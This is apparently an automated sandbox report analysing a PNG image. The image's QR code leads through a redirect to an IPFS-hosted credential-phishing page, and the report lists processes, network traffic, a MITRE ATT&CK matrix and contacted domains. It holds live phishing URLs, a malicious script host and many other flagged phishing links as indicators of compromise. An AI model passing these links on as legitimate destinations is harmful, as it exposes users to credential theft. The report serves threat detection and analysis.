Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.7:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.7:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.7:49741 version: TLS 1.2

Source: C:\Windows\SysWOW64\mspaint.exe	File created: C:\Windows\Debug\WIA			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	File created: C:\Windows\Debug\WIA\wiatrace.log			Jump to behavior

Source: classification engine

Classification label: mal64.phis.winPNG@16/38@18/14

Source: C:\Windows\SysWOW64\mspaint.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mspaint.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\mspaint.exe mspaint.exe "C:\Users\user\Desktop\2024-04-16_11h42_39.png"
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.qrfy.com/hbfzkBMQ4s
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=2072,i,2155693389170485184,14401983771675100146,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=2072,i,2155693389170485184,14401983771675100146,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior

Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: mfc42u.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: winmm.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: msftedit.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: uiribbon.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: xmllite.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: efswrt.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: twinapi.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: sti.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: wiatrace.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: atlthunk.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: dwmapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: windowscodecs.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: textshaping.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: oleacc.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: windows.staterepositoryps.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: photometadatahandler.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: textinputframework.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: coreuicomponents.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Section loaded: coremessaging.dll			Jump to behavior

Source: C:\Windows\SysWOW64\mspaint.exe

File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\mspaint.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\mspaint.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Source: mspaint.exe, 00000000.00000002.2372150327.000000000313D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\SysWOW64\mspaint.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\mspaint.exe

Queries volume information: C:\Users\user\Desktop\2024-04-16_11h42_39.png VolumeInformation

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	11 System Information Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
part-0013.t-0009.t-msedge.net	0%	Virustotal		Browse
thirdmandomavis.com	15%	Virustotal		Browse
cs1100.wpc.omegacdn.net	0%	Virustotal		Browse
www.qrfy.com	0%	Virustotal		Browse
cloudflare-ipfs.com	13%	Virustotal		Browse
aadcdn.msftauth.net	0%	Virustotal		Browse
part-0012.t-0009.t-msedge.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering
https://cloudflare-ipfs.com/favicon.ico	100%	URL Reputation	malware
https://thirdmandomavis.com/js.js	15%	Virustotal		Browse
https://www.qrfy.com/hbfzkBMQ4s	1%	Virustotal		Browse
https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze	12%	Virustotal		Browse
https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
part-0013.t-0009.t-msedge.net	13.107.246.41	true	false	0%, Virustotal, Browse	unknown
thirdmandomavis.com	104.21.2.93	true	false	15%, Virustotal, Browse	unknown
cs1100.wpc.omegacdn.net	152.199.4.44	true	false	0%, Virustotal, Browse	unknown
d2vgu95hoyrpkh.cloudfront.net	3.162.103.56	true	false		high
www.qrfy.com	104.18.20.78	true	false	0%, Virustotal, Browse	unknown
cs837.wac.edgecastcdn.net	192.229.173.207	true	false		high
cdnjs.cloudflare.com	104.17.24.14	true	false		high
cloudflare-ipfs.com	104.17.96.13	true	false	13%, Virustotal, Browse	unknown
www.google.com	142.250.9.103	true	false		high
part-0012.t-0009.t-msedge.net	13.107.213.40	true	false	0%, Virustotal, Browse	unknown
aadcdn.msftauth.net	unknown	unknown	false	0%, Virustotal, Browse	unknown
www.w3schools.com	unknown	unknown	false		high
cdn.socket.io	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze	false	12%, Virustotal, Browse	unknown
https://www.qrfy.com/hbfzkBMQ4s	false	1%, Virustotal, Browse	unknown
https://cloudflare-ipfs.com/favicon.ico	false	URL Reputation: malware	unknown
https://cdn.socket.io/4.6.0/socket.io.min.js	false		high
https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#	true	SlashNext: Credential Stealing type: Phishing & Social Engineering	unknown
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css	false		high
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/webfonts/fa-solid-900.woff2	false		high
https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg	false	0%, Virustotal, Browse	unknown
https://www.w3schools.com/w3css/4/w3.css	false		high
https://thirdmandomavis.com/js.js	false	15%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://fontawesome.com	chromecache_67.3.dr	false		high
https://fontawesome.com/license/free	chromecache_67.3.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.17.96.13	cloudflare-ipfs.com	United States		13335	CLOUDFLARENETUS	false
104.17.24.14	cdnjs.cloudflare.com	United States		13335	CLOUDFLARENETUS	false
13.107.246.41	part-0013.t-0009.t-msedge.net	United States		8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.246.40	unknown	United States		8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.18.20.78	www.qrfy.com	United States		13335	CLOUDFLARENETUS	false
152.199.4.44	cs1100.wpc.omegacdn.net	United States		15133	EDGECASTUS	false
104.21.2.93	thirdmandomavis.com	United States		13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved		unknown	unknown	false
192.229.173.207	cs837.wac.edgecastcdn.net	United States		15133	EDGECASTUS	false
13.107.213.41	unknown	United States		8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.213.40	part-0012.t-0009.t-msedge.net	United States		8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
3.162.103.56	d2vgu95hoyrpkh.cloudfront.net	United States		16509	AMAZON-02US	false
142.250.9.103	www.google.com	United States		15169	GOOGLEUS	false

Private

IP
192.168.2.7

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1426615
Start date and time:	2024-04-16 11:43:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	2024-04-16_11h42_39.png
Detection:	MAL
Classification:	mal64.phis.winPNG@16/38@18/14
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.105.94, 74.125.138.138, 74.125.138.101, 74.125.138.102, 74.125.138.113, 74.125.138.139, 74.125.138.100, 142.250.9.84, 34.104.35.123, 108.177.122.94, 74.125.138.95, 172.253.124.95, 142.250.105.95, 172.217.215.95, 173.194.219.95, 142.251.15.95, 64.233.176.95, 108.177.122.95, 64.233.177.95, 74.125.136.95, 64.233.185.95, 142.250.9.95, 142.250.9.94, 199.232.210.172, 74.125.136.94, 74.125.136.139, 74.125.136.113, 74.125.136.101, 74.125.136.102, 74.125.136.100, 74.125.136.138
Excluded domains from analysis (whitelisted): logincdn.msauth.net, clients1.google.com, fs.microsoft.com, lgincdnmsftuswe2.azureedge.net, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, aadcdn.msauth.net, time.windows.com, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, lgincdnmsftuswe2.afd.azureedge.net, clients.l.google.com, www.gstatic.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:46:08	API Interceptor	145x Sleep call for process: mspaint.exe modified

QR Codes

Source	URL
Image Sample	https://www.qrfy.com/hbfzkBMQ4s

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.17.96.13	http://cloudflare-ipfs.com/ipfs/bafybeiax2ruknatvfmwne467bwtdm76yq33oczfhuaqkiq5cs4yc2lb7ti/kellermadisongr_office9o0.html/	Get hash	malicious	HTMLPhisher	Browse	cloudflare-ipfs.com/ipfs/bafybeiax2ruknatvfmwne467bwtdm76yq33oczfhuaqkiq5cs4yc2lb7ti/kellermadisongr_office9o0.html/
104.17.24.14	http://vtaurl.com	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-brands-400.woff2
104.17.24.14	http://Voyages.CNTraveler.com	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/ScrollMagic/2.0.5/plugins/animation.gsap.js
13.107.246.41	http://www.surveymonkey.com/tr/v1/te/PUEIZHbYTJGrZEIkVMWlCoicdktJQxDgUh5D5mhe1V5RrTmuIdynx7PnFHXRUx9slMgQjvZdyUWqhr_2Bl49oNXjy3TOleTjKMKR6WbsGcrstlT2syBMlSkW7U5aKlKcBD9NFqJqrxGyODSWJJr6_2BMbXsKkDA_2F0ep4iw23xw6huuM_3D	Get hash	malicious	Unknown	Browse	www.eand.com/en/index.html
	02-11-2024 MVP.html	Get hash	malicious	Unknown	Browse	www.mvphealthcare.com/
	02-11-2024 MVP.html	Get hash	malicious	Unknown	Browse	www.mvphealthcare.com/
	http://y84x.mjt.lu/lnk/CAAABPdweCoAAAAAAAAAAAVG8MwAAAA6pnMAAAAAAAvpOQBlhIO4-ImJ1UImRBC5CNVIkLSaswAL-7Q/2/r-vXj7XjX0azsD7QNKNH-A/aHR0cHM6Ly9hcHBjZW50ZXIubXMvaW52aXRhdGlvbnMvb3JnL2IxNjM2ZDYzMTE0YTM0MjBkYWFmNTg4YTE5N2Y0N2MxNGY4ZDViNWMyM2ZjM2RhYTgxMWM0ODgwOWM1ZTZkNjQ	Get hash	malicious	Unknown	Browse	appcenter.ms/
	http://url7816.acetaxi.com/ls/click?upn=k9eqZnPBEZmPVPka3LxS61O1ksdCJOgznvtiwccqzi2-2BneqvfCXEJ-2FQj-2BZo7snmCwDunBahf2LYhfs7qQp7-2F23xLStq-2BkxJ70xqVvyXzkWM-3D8Cie_z5TGfmB4A65PPE2hDgRdrx6OZsZ3AmrJLHJ0M9ePWeHP5QDTWsAVp117uXam9dNn-2BGSxHeP-2BInRF-2Bgy2v-2FXBPODjmLss6NRV2RYsUYD7um77hgLl0ET9pPGTHF-2BQ1m6-2Fw7-2B-2B9DJOpakZj874YLC8uUep0F7rZMDlM46gmHmQqqAeCV477M0h2b07T2IcXu0hzUcKftN0UG2jhPq8qo00cQl0gvOLl-2BjChyaOdLpENao-3D	Get hash	malicious	Unknown	Browse	twiliosolutions.azurefd.net/
13.107.246.40	NEW ORDER.xls	Get hash	malicious	Unknown	Browse	2s.gg/3zs
	PO_OCF 408.xls	Get hash	malicious	Unknown	Browse	2s.gg/42Q
	06836722_218 Aluplast.docx.doc	Get hash	malicious	Unknown	Browse	2s.gg/3zk
	Quotation.xls	Get hash	malicious	Unknown	Browse	2s.gg/3zM

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
d2vgu95hoyrpkh.cloudfront.net	http://www5.dmpcalibermail.com/caliberamp/main/index.php?action=t&tag=https%3A%2F%2Fwww.newrezcorrespondent.com%2F%3Futm_source%3Damp%26amp%3Butm_medium%3Demail%26amp%3Butm_campaign%3Dheader_logo%26amp%3Butm_content%3D%5Bemail%3Acampaign_name%5D&id=2970982&contact_uuid=607faabe-0fa9-4b6c-aa85-af116b0a0d16&dest=https://hajradyeing.com%2F%5F%63%63%63%2Fq5LqZBTIawkLdAIGigpV3n1o5fE7vg/bHVjYS50YXNzb3R0aUBiZWFudGVjaC5pdA==	Get hash	malicious	HTMLPhisher	Browse	52.84.125.99
	http://theprudhommeteam.88stink.com/	Get hash	malicious	HTMLPhisher	Browse	13.226.210.95
	https://lookerstudio.google.com/s/ow_9c3UHIyo	Get hash	malicious	HTMLPhisher	Browse	13.225.214.38
	https://tracker.club-os.com/campaign/click?msgId=f8ea317d963149a518aa35e03e5541f797badf3c&target=revistaegle.com/revistaegle/revistaegle/pMBFN17716pMBFN17716pMBFN/TG91aXMuRnJhbnplc2VAQU1DTkVUV09SS1MuQ09N	Get hash	malicious	HTMLPhisher	Browse	13.225.214.27
	https://sapoku.firflare.com/XmZL7sU3/	Get hash	malicious	HTMLPhisher	Browse	13.225.214.38
	https://docs.google.com/presentation/d/e/2PACX-1vTDYiKRA4Xpi87V1ueZYWLPwiU1D7IimpaLgw9IwC2WOcZVcxEAqv83v8l-qPScyrAJ2_Ln7kd6oD0B/pub?start=false&loop=false&delayms=3000	Get hash	malicious	HTMLPhisher	Browse	13.225.214.38
	phish_alert_iocp_v1.4.48 (27).eml	Get hash	malicious	HTMLPhisher	Browse	13.225.214.38
	https://tracker.club-os.com/campaign/click?msgId=f8ea317d963149a518aa35e03e5541f797badf3c&target=kal-alphatravels.com/alphatravels/alphatravels/GQqCo21044GQqCo21044GQqCo/ZnJhbmt0QGhhd2FpaWFucHJvcC5jb20=	Get hash	malicious	HTMLPhisher	Browse	13.225.214.2
	phish_alert_iocp_v1.4.48 (23).eml	Get hash	malicious	HTMLPhisher	Browse	13.225.214.72
	QuarantineDownload.zip	Get hash	malicious	HTMLPhisher	Browse	13.225.214.27
cs837.wac.edgecastcdn.net	Attachment dl.gf.it_erp_p2p_jaggaer@globalfoundries.com-----ADOBE-FILE.HTML	Get hash	malicious	Unknown	Browse	192.229.173.207
	ATT28392.htm_	Get hash	malicious	HTMLPhisher	Browse	192.229.173.207
	https://quiz.tryinteract.com/#/6616d475ab2cc50015573c84	Get hash	malicious	Unknown	Browse	192.229.173.207
	https://coperationcompany.xyz/n/U1Y9bzM2NV82X25vbQ==/VUlEPVVTRVIwMTA0MjAyNFVOSVFVRTEwMjcwNDAxNTMyMDI0MjAyNDA0MDEyNzEwNTM=/	Get hash	malicious	HTMLPhisher	Browse	192.229.173.207
	https://www.surveymonkey.com/tr/v1/te/akU_2BQc2vAhAsa_2B264x1g6_2FpF_2Fhy3EhxbpxJDHYpYZT3PErDK_2Bf6OjNYOPsqZdKwg1FzF0BnjDAGLKtSwWsTWescd252jHDUssF95noWETx50NAtsDT_2FwPDzD_2FTuRJvRXtr_2F38HPTPPrNs091S8Nbhkk_2Fl0xRzf94S_2FukU_2BJCn4A8F2xUD6W_2F494D_2Bk_2BUIHNcF0kF9MJXPACd0TOf_2FryEjSvcwt5388_2B9PAUnTAORsIBA6XANs79PokM5yikCF5e7	Get hash	malicious	HTMLPhisher	Browse	192.229.173.207
	https://cloudflare-ipfs.com/ipfs/bafkreiei4pxrcjpggzud4xyyiyiabwytakelojvp5lwpyll5mt4yy7l4lq	Get hash	malicious	Unknown	Browse	192.229.173.207
	https://cloudflare-ipfs.com/ipfs/bafkreic3i3fs3k4jlf22yl27nsvzygbmg4qrugkfu2cq65waif525cpbx4#	Get hash	malicious	HTMLPhisher	Browse	192.229.173.207
	https://nhlnkc.com/api/v1/track/link/click/63bba6a47a3f62bf2d36bda8/emails.649b108787b7027f9ddac21f?link=http://930634sxy2v0.fastfiles.co/ad/Z2lsbGVzLmdhcmNpYUBiY3AtYmFuay5jb20=	Get hash	malicious	HTMLPhisher	Browse	192.229.173.207
	https://telegra.ph/Allgeier-Family-04-03	Get hash	malicious	Unknown	Browse	192.229.173.207
	https://cloudflare-ipfs.com/ipfs/bafkreic5cim75bfwol7zgorq6schylihmy7lvayr3gfy4t5oewdr54hite#	Get hash	malicious	HTMLPhisher	Browse	192.229.173.207
cs1100.wpc.omegacdn.net	https://15apmic10.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	152.199.4.44
	Voice#Ud83d#Udce5_#U23ea#U23ef#Ufe0f#U23e9_167.html	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://myworkspacea9fc6.myclickfunnels.com/onlinereview--3d69f?preview=true	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://pub-fc51d290db584b328d6feb3913c634a1.r2.dev/office365webb.html	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://pub-e98bcbb63fbd4f549e44c6a27ef5d234.r2.dev/to.html	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://pub-ccab1e1c90754b44a899b93b24a61322.r2.dev/pp.html	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://myqrcode.mobi/30dceb3b	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://wwwlkwmwm12m21mm211.z13.web.core.windows.net/	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://app.adjust.com/97grly?joiylabel=2ch_002&redirect=//minhaclaro.dtmmkt.com.br%2Feffectivemail/redirecionaclique.aspx?idabordagem=5252932746%25%32%36idlink=126090168=%0A66%25%32%36endereco=//tubest%E3%80%82com%E3%80%82tr/toro/4exq/YnJlbmRhYmFrZXJAYmFrZXJzZWxkZXJsYXcuY29t&$	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	OriginatingEmail (55).eml	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
thirdmandomavis.com	https://telegra.ph/Allgeier-Family-04-03	Get hash	malicious	Unknown	Browse	104.21.2.93
	https://www.canva.com/design/DAF8yEaRhAs/RQHXimFRXEBcpCj4yinKTA/view?utm_content=DAF8yEaRhAs&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	104.21.2.93
	https://t.co/FV58ai4Iu3	Get hash	malicious	HTMLPhisher	Browse	104.21.2.93
	https://cloudflare-ipfs.com/ipfs/bafkreidireckoznexfjfbsxswt7f6nvtvuhh43w7uthmbwiqbpqvcwfpny	Get hash	malicious	HTMLPhisher	Browse	172.67.129.10
	https://cloudflare-ipfs.com/ipfs/bafkreidireckoznexfjfbsxswt7f6nvtvuhh43w7uthmbwiqbpqvcwfpny	Get hash	malicious	HTMLPhisher	Browse	104.21.2.93
	https://t.co/NnHjZHwZzs	Get hash	malicious	HTMLPhisher	Browse	104.21.2.93
	http://t.co/LqaCO8fscS	Get hash	malicious	HTMLPhisher	Browse	172.67.129.10
	http://t.co/LqaCO8fscS	Get hash	malicious	HTMLPhisher	Browse	104.21.2.93
	NnHjZHwZzs.htm	Get hash	malicious	HTMLPhisher	Browse	104.21.2.93
	https://protect-usb.mimecast.com/s/b-DPCA8EXWfNrL46iGYkeP?domain=t.co	Get hash	malicious	HTMLPhisher	Browse	172.67.129.10
www.qrfy.com	https://www.qrfy.com/zpSjrbvZ6Z	Get hash	malicious	HTMLPhisher	Browse	172.66.41.44
	https://www.qrfy.com/zpSjrbvZ6Z	Get hash	malicious	HTMLPhisher	Browse	172.66.42.212
	postacert.eml (803 KB).msg	Get hash	malicious	HTMLPhisher	Browse	172.66.41.44
part-0013.t-0009.t-msedge.net	https://sociallinks.lt.acemlnb.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZzb2NpYWxsaW5rcy5pbyUyRm9zaW50LXdlYmluYXJzJTJGd2ViaW5hci1lbmhhbmNpbmctYW1sLWludmVzdGlnYXRpb25zLXdpdGgtb3NpbnQlM0Z1dG1fc291cmNlJTNEZW1haWwlMjZ1dG1fbWVkaXVtJTNEd2ViaW5hciUyNnV0bV9jYW1wYWlnbiUzRGFtbF8wNF8yNA==&sig=bEXSTLMngghhoUjnhUiGrKrf6GsWGU1eAwJ54z8GbBH&iat=1712921684&a=%7C%7C612077526%7C%7C&account=sociallinks%2Eactivehosted%2Ecom&email=I4809riumLU7t4jf%2BoK9uHOsQeuYYw6CYkuCsQDv%3AFRtI69CZolNJDOUhiGMO%2BO9bqaecpEWw&s=f7847248dd0f6e35d5eb6514571a7081&i=993A1018A3A5488	Get hash	malicious	Unknown	Browse	13.107.213.41
